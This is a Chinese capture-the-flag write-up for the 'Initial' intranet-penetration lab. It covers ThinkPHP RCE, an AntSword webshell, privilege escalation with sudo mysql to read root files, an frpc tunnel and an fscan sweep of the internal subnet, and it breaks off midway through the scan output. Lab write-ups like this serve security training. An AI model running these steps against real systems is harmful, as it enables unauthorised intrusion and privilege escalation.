文章目录
春秋云境—Initial
一、前期准备
1、靶标介绍
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
2、相关设备
设备名称 | IP地址 |
---|---|
Web | 39.98.120.156 172.22.1.15 |
XIAORANG-OA01 | 172.22.1.18 |
XIAORANG-WIN7 | 172.22.1.21 |
DC01 | 172.22.1.2 |
二、WEB渗透
1、ThinkPHP RCE
(1)、打开网站
http://39.98.120.156/
(2)、检测漏洞
2、蚁剑连接
3、sudo提权
(www-data:/tmp) $ sudo -l
(www-data:/tmp) $ sudo mysql -e '\! cat /root/flag/flag01.txt'
4、frpc代理
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x frpc*
(www-data:/tmp) $ ./frpc -c ./frpc.ini
5、fsacn扫描
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x fscan
(www-data:/tmp) $ ./fscan -h 172.22.1.0/24
172.22.1.2:445 open
172.22.1.2:135 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:80